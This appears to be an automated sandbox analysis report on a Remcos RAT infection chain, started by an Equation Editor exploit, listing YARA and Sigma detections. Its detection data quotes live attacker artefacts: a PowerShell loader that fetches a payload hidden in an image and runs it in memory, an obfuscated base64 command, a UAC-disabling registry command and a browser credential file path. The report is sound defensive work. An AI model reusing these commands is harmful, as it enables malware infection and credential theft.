Process Memory Space: powershell.exe PID: 3272	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x17aa0:$b2: ::FromBase64String( 0x1d910:$b2: ::FromBase64String( 0x1dfbe:$b2: ::FromBase64String( 0x24879:$b2: ::FromBase64String( 0x6cbd9d:$b2: ::FromBase64String( 0x6cc34f:$b2: ::FromBase64String( 0x6cdfa1:$b2: ::FromBase64String( 0x6d0a70:$b2: ::FromBase64String( 0x6d1023:$b2: ::FromBase64String( 0x6d23ac:$b2: ::FromBase64String( 0x6eb18a:$b2: ::FromBase64String( 0x6eb743:$b2: ::FromBase64String( 0x6ebf18:$b2: ::FromBase64String( 0x6ec695:$b2: ::FromBase64String( 0x6ecc81:$b2: ::FromBase64String( 0x6ee84c:$b2: ::FromBase64String( 0x6efdba:$b2: ::FromBase64String( 0x72cee1:$b2: ::FromBase64String( 0x8dffac:$b2: ::FromBase64String( 0x113208b:$b2: ::FromBase64String( 0x1132dd7:$b2: ::FromBase64String(
Process Memory Space: RegAsm.exe PID: 3540	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 3540	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: RegAsm.exe PID: 3540	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x1738a:$a1: Remcos restarted by watchdog! 0x178e4:$a3: %02i:%02i:%02i:%03i 0x17d13:$a3: %02i:%02i:%02i:%03i
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.RegAsm.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
12.2.RegAsm.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
12.2.RegAsm.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
12.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.RegAsm.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
12.2.RegAsm.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
12.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
8.2.powershell.exe.467ae68.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.powershell.exe.467ae68.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.powershell.exe.467ae68.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
8.2.powershell.exe.467ae68.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
8.2.powershell.exe.467ae68.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
8.2.powershell.exe.467ae68.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.powershell.exe.467ae68.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.powershell.exe.467ae68.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0xe32e8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i 0xe3860:$a3: %02i:%02i:%02i:%03i
8.2.powershell.exe.467ae68.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0xdd228:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0xdd1bc:$s1: CoGetObject 0xdd1d0:$s1: CoGetObject 0xdd1ec:$s1: CoGetObject 0xe7178:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new: 0xdd17c:$s2: Elevation:Administrator!new:
Click to see the 14 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 23.95.60.75, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1732, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1732, TargetFilename: C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs

Spreading

Sigma detected: Powershell download payload from hardcoded c2 list

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }", CommandLine|base64offset|contain

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1732, Protocol: tcp, SourceIp: 23.95.60.75, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }", CommandLine|base64offset|contain

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3088, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1732, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs" , ProcessId: 3088, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1732, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs" , ProcessId: 3088, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

